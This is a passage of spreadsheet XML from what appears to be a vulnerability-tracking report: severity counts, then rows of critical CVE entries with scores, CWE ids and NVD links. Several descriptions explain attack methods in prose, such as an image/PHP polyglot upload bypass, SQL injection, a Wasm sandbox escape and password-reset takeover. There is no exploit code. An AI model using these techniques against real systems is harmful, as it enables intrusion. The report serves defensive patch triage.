      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>125</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>68</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>349</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>274</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>40</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>159</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>383</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>126</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CVE-2026-76504</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:catalyst_sd-wan_manager</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-03</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-177</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API session-based authentication management of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to access an affected system with privileges of the admin user.
This vulnerability is due to improper handling of URI encoding in an HTTP request, which allows the request to bypass an authentication rule that is intended to restrict access to a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted HTTP request to the API of the affected system. A successful exploit could allow the attacker to bypass authentication and gain access to the API as the admin user.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76504</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102427</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S3" s="5"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the uploaded file’s content with a real magic-byte MIME check, but the extension allow-list that would otherwise restrict the saved file’s extension was present in the source and commented out. The saved file’s extension was taken directly from the attacker-supplied filename with no validation, and the file was written to a path directly under the Joomla web root that is executed by the PHP handler. An image/PHP polyglot, a file whose header bytes satisfy the MIME check with PHP source appended after, passed the content check while carrying a .php extension of the attacker’s choosing.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102427</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55107</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Kobako is a Ruby gem that embeds a Wasm-isolated mruby interpreter inside applications, allowing execution of untrusted Ruby scripts (LLM-generated code, user formulas, student submissions, third-party plugins) in-process without giving them access to host memory, files, network, or credentials. From version 0.1.0 to before version 0.9.1, a guest mruby script running inside the Kobako sandbox can execute arbitrary Ruby in the host process, fully escaping the sandbox. This issue has been patched in version 0.9.1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55107</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76570</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomcode.com - Unauthenticated SQL injection in read and write queries in JCTables  1.21.1 - The front-end CRUD API controller performs no Joomla token validation and no authentication check on any task. Table names, column names, and values are taken directly from request parameters and concatenated into SQL queries, allowing SQLi for reading and writing queries.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76570</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96349</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in SiteSkite &lt;= 2.1.8 versions.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96349</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100512</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Nested Pages &lt;= 3.3.2 versions.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100512</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102115</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core did not correctly validate a parameter submitted to the password reset workflow. An unauthenticated attacker who knew the email address of a user with a locally stored password could potentially reset that account's password without access to the emailed reset link and then authenticate as that user, including where the account holds administrative privileges.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102115</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18782</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Command Line Execution through SQL Injection.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18782</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55494</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.4, Tugtainer Agent allows unauthenticated access to Docker management APIs when AGENT_SECRET is not configured. The Agent uses request signatures to protect its API routes. However, in agent/auth.py, the signature verification function returns successfully if Config.AGENT_SECRET is empty. This causes protected Agent APIs to become accessible without authentication. This issue has been patched in version 1.30.4.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55494</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82307</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Dolusoft Software Technologies SOPLOG allows SQL Injection.
This issue affects SOPLOG: before Soplog 2026.9.4.1.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82307</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88920</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in the DOM security processor in Apache WSS4J allows unauthenticated remote attackers to forge authenticated SOAP messages via a crafted unsigned SAML sender-vouches assertion containing an attacker-controlled key.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88920</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96350</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96350</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97248</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Booking Activities &lt;= 1.18.7.1 versions.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97248</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97274</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in OAuth Single Sign On – SSO (OAuth Client) &lt;= 7.1.2 versions.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97274</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102149</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently restrict which account a certificate could be assigned to. This could allow an attacker to associate a certificate with another user's account, affecting the confidentiality and integrity of that account's encrypted mail and, where certificate-based login is enabled, potentially permitting unauthorized access to the account.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102149</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102489</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
